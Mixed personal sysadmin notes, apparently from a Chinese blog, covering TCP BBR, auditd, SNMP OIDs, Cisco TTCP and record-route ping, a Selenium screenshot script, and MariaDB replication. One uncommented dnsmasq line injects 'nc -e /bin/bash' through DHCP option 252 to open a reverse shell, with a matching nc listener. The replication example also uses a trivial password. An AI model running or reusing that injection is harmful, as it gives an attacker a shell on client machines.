CUBIC TCP 目前大多数Linux缺省使用的TCP流量拥塞算法 RFC8312


google bbr (Bottleneck Bandwidth and Round-trip propagation time)
google在GCP平台应用bbr TCP BBR congestion control comes to GCP
GCP-TCP-BBR-animate-r32B252812529plh0.GIF

What is BBR?
BBR ("Bottleneck Bandwidth and Round-trip propagation time") is a new congestion control algorithm developed at Google. Congestion control algorithms — running inside every computer, phone or tablet connected to a network — that decide how fast to send data.
How does a congestion control algorithm make this decision? The internet has largely used loss-based congestion control since the late 1980s, relying only on indications of lost packets as the signal to slow down. This worked well for many years, because internet switches’ and routers’ small buffers were well-matched to the low bandwidth of internet links. As a result, buffers tended to fill up and drop excess packets right at the moment when senders had really begun sending data too fast.

But loss-based congestion control is problematic in today's diverse networks:

In shallow buffers, packet loss happens before congestion. With today's high-speed, long-haul links that use commodity switches with shallow buffers, loss-based congestion control can result in abysmal throughput because it overreacts, halving the sending rate upon packet loss, even if the packet loss comes from transient traffic bursts (this kind of packet loss can be quite frequent even when the link is mostly idle).
In deep buffers, congestion happens before packet loss. At the edge of today's internet, loss-based congestion control causes the infamous “bufferbloat” problem, by repeatedly filling the deep buffers in many last-mile links and causing seconds of needless queuing delay.
We need an algorithm that responds to actual congestion, rather than packet loss. BBR tackles this with a ground-up rewrite of congestion control. We started from scratch, using a completely new paradigm: to decide how fast to send data over the network, BBR considers how fast the network is delivering data. For a given network connection, it uses recent measurements of the network's delivery rate and round-trip time to build an explicit model that includes both the maximum recent bandwidth available to that connection, and its minimum recent round-trip delay. BBR then uses this model to control both how fast it sends data and the maximum amount of data it's willing to allow in the network at any time.

找到的bbr研究BBR-Congestion-Based-Congestion-Control.pdf

审计所有命令

-a exit,always -F arch=b64 -S execve
-a exit,always -F arch=b32 -S execve

发送到syslog
sed -i 's/active = no/active = yes/g' /etc/audisp/plugins.d/syslog.conf

SNMP 版本
有V1 V2c V3
V1使用明文community,The biggest downsides are that it does not support 64 bit counters, only 32 bit counters, and that it has little security.
V2c和V1使用明文community,it adds support for 64 bit counters. SNMPv2c is a sub-version of SNMPv2. Its key advantage over previous versions is the Inform command. Unlike Traps, which are simply received by a manager, Informs are positively acknowledged with a response message. If a manager does not reply to an Inform, the SNMP agent will resend the Inform.
V3可设置身份验证及数据在网络传输时加密

SNMP 方法
常用的是Get, GetNext, Set, Trap
ro(read only)的community/username password不能使用set方法
rw(read write)可以使用全部方法

SNMP 端口
SNMP使用UDP(IP 17) 161
SNMP trap使用UDP 162 (部分系统组件/配置发生变更,SNMP daemon主动发送消息通知网管平台)

SNMP OID结构 [图片来源Paessler AG]
653-OID+tree.png

SNMP v1 defines a special TRAP message format, different from other messages (such as GET). http://tools.ietf.org/html/rfc1157#page-27
This message format is not used any more in SNMP v2 and v3. If an SNMP agent sends out such TRAP messages for v2 or v3, that can be a bug. Since v2, TRAP starts to use the common message format (the same as GET and so on). So it is called SNMPv2-Trap-PDU. http://tools.ietf.org/search/rfc3416#page-22 SNMP v3 introduces the security model to all messages, so TRAP receives such update too. It is still based on SNMPv2-Trap-PDU.

Debian系 SNMP trap配置一些问题
启动snmp daemon,日志提示

  /etc/snmp/snmpd.conf: line 145: Warning: Unknown token: defaultMonitors.
  /etc/snmp/snmpd.conf: line 147: Warning: Unknown token: linkUpDownNotifications.
Edit /etc/default/snmpd:
comment the "export MIBS=" line:
#export MIBS=
remove ",mteTrigger,mteTriggerConf" from the SNMPDOPTS line:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -g snmp -I -smux -p /run/snmpd.pid'
install snmp-mibs-downloader. It will download abunch of MIBs in its postinst:
sudo apt install snmp-mibs-downloader

RHEL常用的OID

Network Interface Statistics
List NIC names: .1.3.6.1.2.1.2.2.1.2
Get Bytes IN: .1.3.6.1.2.1.2.2.1.10
Get Bytes IN for NIC 4: .1.3.6.1.2.1.2.2.1.10.4
Get Bytes OUT: .1.3.6.1.2.1.2.2.1.16
Get Bytes OUT for NIC 4: .1.3.6.1.2.1.2.2.1.16.4

CPU Statistics
Load
1 minute Load: .1.3.6.1.4.1.2021.10.1.3.1
5 minute Load: .1.3.6.1.4.1.2021.10.1.3.2
15 minute Load: .1.3.6.1.4.1.2021.10.1.3.3

CPU times
percentage of user CPU time: .1.3.6.1.4.1.2021.11.9.0
raw user cpu time: .1.3.6.1.4.1.2021.11.50.0
percentages of system CPU time: .1.3.6.1.4.1.2021.11.10.0
raw system cpu time: .1.3.6.1.4.1.2021.11.52.0
percentages of idle CPU time: .1.3.6.1.4.1.2021.11.11.0
raw idle cpu time: .1.3.6.1.4.1.2021.11.53.0
raw nice cpu time: .1.3.6.1.4.1.2021.11.51.0

Memory Statistics
Total Swap Size: .1.3.6.1.4.1.2021.4.3.0
Available Swap Space: .1.3.6.1.4.1.2021.4.4.0
Total RAM in machine: .1.3.6.1.4.1.2021.4.5.0
Total RAM used: .1.3.6.1.4.1.2021.4.6.0
Total RAM Free: .1.3.6.1.4.1.2021.4.11.0
Total RAM Shared: .1.3.6.1.4.1.2021.4.13.0
Total RAM Buffered: .1.3.6.1.4.1.2021.4.14.0
Total Cached Memory: .1.3.6.1.4.1.2021.4.15.0

Disk Statistics
Add the following line to snmpd.conf and restart:
includeAllDisks 10% for all partitions and disks
Disk OID's
Path where the disk is mounted: .1.3.6.1.4.1.2021.9.1.2.1
Path of the device for the partition: .1.3.6.1.4.1.2021.9.1.3.1
Total size of the disk/partion (kBytes): .1.3.6.1.4.1.2021.9.1.6.1
Available space on the disk: .1.3.6.1.4.1.2021.9.1.7.1
Used space on the disk: .1.3.6.1.4.1.2021.9.1.8.1
Percentage of space used on disk: .1.3.6.1.4.1.2021.9.1.9.1
Percentage of inodes used on disk: .1.3.6.1.4.1.2021.9.1.10.1

System Uptime: .1.3.6.1.2.1.1.3.0

IANA分配的OID查询 https://www.iana.org/assignments/enterprise-numbers/enterprise-numbers

TTCP requires Cisco IOS® Software Version 11.2 or higher and Feature
Sets IP Plus (is- images) or Service Provider (p- images). Note: The
ttcp command is a hidden, unsupported, privileged mode command. As
such, its availability may vary from one Cisco IOS software release to
another, such that it might not exist in some releases. Some
platforms, for instance, require the Cisco IOS Enterprise feature set
in order to perform this activity.

可以路由器对路由器,路由器对电脑

customer-dialin-sj>ttcp 
transmit or receive [receive]: transmit 
Target IP address: 10.1.1.52 
perform tcp half close [n]: 
use tcp driver [n]: 
send buflen [8192]: #buffers长度
send nbuf [2048]: 50 #buffers数量
bufalign [16384]: 
bufoffset [0]: 
port [5001]: 
sinkmode [y]: 
buffering on writes [y]: 
show tcp information at end [n]:
ttcp-t: buflen=8192, nbuf=50, align=16384/0, port=5001 tcp ->10.1.1.52
ttcp-t: connect (mss 1460, sndwnd 4096, rcvwnd 4128) 

Result

ttcp-t: buflen=8192, nbuf=50, align=16384/0, port=5001 tcp -> 10.1.1.52 ttcp-t: connect (mss 1460, sndwnd 4096, rcvwnd 4128) ttcp-t: 409600 bytes in 84544 ms (84.544 real seconds) (~3 kB/s) +++ ttcp-t: 50 I/O calls
ttcp-t: 0 sleeps (0 ms total) (0 ms average) 
Since it is most common to evaluate connect speeds in kbps (kilobits
per second, or 1000 bits per second) rather that KBps (kilobytes per
second, or 1024 bytes per second), we must use the information from
TTCP to calculate the bit rate (in kbps). Use the number of bytes
received and the transfer time to calculate the actual bit rate for
the connection. Calculate the bit rate by converting the number of
bytes into bits and then divide this by the time for the transfer. In
this example, the windows PC received 409600 bytes in 84.94 seconds.
We can calculate the bit rate to be (409600 bytes * 8 bits per byte)
divided by 84.94 seconds=38577 BPS or 38.577 kbps.

Referer: Using Test TCP (TTCP) to Test Throughput

#coding:utf-8
from selenium import webdriver
import time
import os
import sys
from selenium.webdriver.firefox.options import Options
import requests

options = Options()
options.set_headless(headless=True)
driver = webdriver.Firefox(firefox_options=options)
driver.get('https://feng.cmd.gd/')
driver.set_page_load_timeout(30)
hiname = driver.find_element_by_xpath("//div[@id='chart']//p[@class='chart z']//a[@class='xi2']").text
userimg = '/web/wwwroot/default/' + hiname + '.png'
if not os.path.isfile(userimg):
    driver.find_element_by_xpath("//div[@id='chart']//p[@class='chart z']//a[@class='xi2']").click()
    time.sleep(2)
    driver.switch_to_window(driver.window_handles[1])
    driver.save_screenshot(userimg)
    #---upload image
    smms = 'https://sm.ms/api/upload'
    files = {'smfile': open(userimg, 'rb')}
    response = requests.post(smms, files=files)
    imgurl = response.json()
    print imgurl
    wtxt = open('/web/wwwroot/default/upload.txt', 'a')
    wtxt.write(str(imgurl))
    wtxt.close()

driver.quit()   #quit-firefox-drive
sys.exit(0)

ICMP Record Route反向路径追踪最大9跳,使用IP Option 7 More IP Options

r4#trace 150.1.5.5
Type escape sequence to abort.
Tracing the route to 150.1.5.5
  1 155.1.45.5 4 msec
    155.1.0.5 4 msec *
r4#
r4#ping
Protocol [ip]:
Target IP address: 150.1.5.5
Repeat count [5]: 2
Datagram size [100]:
Timeout in seconds [2]:
Extended commands [n]: y
Source address or interface:
Type of service [0]:
Set DF bit in IP header? [no]:
Validate reply data? [no]:
Data pattern [0xABCD]:
Loose, Strict, Record, Timestamp, Verbose[none]: record
Number of hops [ 9 ]:
Loose, Strict, Record, Timestamp, Verbose[RV]:
Sweep range of sizes [n]:
Type escape sequence to abort.
Sending 2, 100-byte ICMP Echos to 150.1.5.5, timeout is 2 seconds:
Packet has IP options:  Total option bytes= 39, padded length=40
 Record route: <*>
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)

Reply to request 0 (4 ms).  Received packet has options
 Total option bytes= 40, padded length=40
 Record route:
   (155.1.45.4) <-s0/1
   (150.1.5.5)  <-destination
   (155.1.45.5) <-return path
   (155.1.45.4) <*>
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
 End of list

Reply to request 1 (8 ms).  Received packet has options
 Total option bytes= 40, padded length=40
 Record route:
   (155.1.0.4) <-s0/0
   (150.1.5.5) <-destination
   (155.1.0.5) <-return path
   (155.1.0.4) <*>
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
   (0.0.0.0)
 End of list

Success rate is 100 percent (2/2), round-trip min/avg/max = 4/6/8 ms

dnsmasq --user=root --interface=eth0 --bind-interfaces  --except-interface=lo --dhcp-range=10.10.0.10,10.10.0.20,1h --conf-file=/dev/null --dhcp-option=6,10.10.0.1 --dhcp-option=3,10.10.0.1 --dhcp-option="252,yarrak'&nc -e /bin/bash 10.10.0.3 1337 #" --log-queries --log-facility=/var/log/dnsmasq-server.log
nc -l -p 1337 -v

打算切换到GNU/Linux,尝试走的弯路,于是产生此文。
使用Debian sid。


使用的软件

影视播放 VLC
截图 deepin-screenshot (深度[deepin.org]做的截图软件,和Windows™ 下的QQ差不多。。。
文件检索 ANGRYsearch (同样和Windows™ 下的Everything差不多


用的xfce4,自带的自动代理不知道为何不生效,Google了一下,发现如下解决方法:

Referer : does xfce4 support automatic proxy configuration?

You can set up auto_proxy/AUTO_PROXY variables in /etc/environment like:

auto_proxy="https://someurl.to/your.pac"
AUTO_PROXY="https://someurl.to/your.pac"

and logout/login after that.

版本 mysql Ver 15.1 Distrib 10.1.29-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
Debian buster

Master:

修改Mariadb的配置文件 /etc/mysql/mariadb.conf.d/50-server.cnf

...
bind-address = 0.0.0.0
...
server-id = 1
log_bin = /web/data/mariadb/mysql-bin.log
...

更改文件夹拥有者 chown mysql.mysql /web/data/mariadb/
重启Mariadb systemctl restart mariadb

进入mysql命令行,增加复制数据库权限的用户

# mysql

MariaDB [(none)]> GRANT REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'sync'@'10.10.10.11' IDENTIFIED BY 'sync';
MariaDB [(none)]> FLUSH PRIVILEGES;
MariaDB [(none)]> EXIT

如果主服务器部署在互联网,应设置防火墙(如iptables)禁止非法扫描。

iptables -A INPUT -p tcp --dport 3306 -s 1.1.1.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 3306 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 3306 -j DROP

Slave:

修改Mariadb的配置文件 /etc/mysql/mariadb.conf.d/50-server.cnf

...
server-id = 2
relay-log = /data/mariadb/relay.log
#log_bin = /var/log/mysql/mysql-bin.log
...

更改文件夹拥有者 chown mysql.mysql /data/mariadb/
重启Mariadb systemctl restart mariadb

进入mysql命令行,设置主服务器的IP地址、用户名、密码。

mysql

MariaDB [(none)]> CHANGE MASTER TO MASTER_HOST='10.10.10.10', MASTER_USER='sync', MASTER_PASSWORD='sync';
MariaDB [(none)]> START SLAVE;
MariaDB [(none)]> SHOW SLAVE STATUS\G
MariaDB [(none)]> EXIT

注意mysql数据库文件目录的拥有者。
chown mysql.mysql -R /var/lib/mysql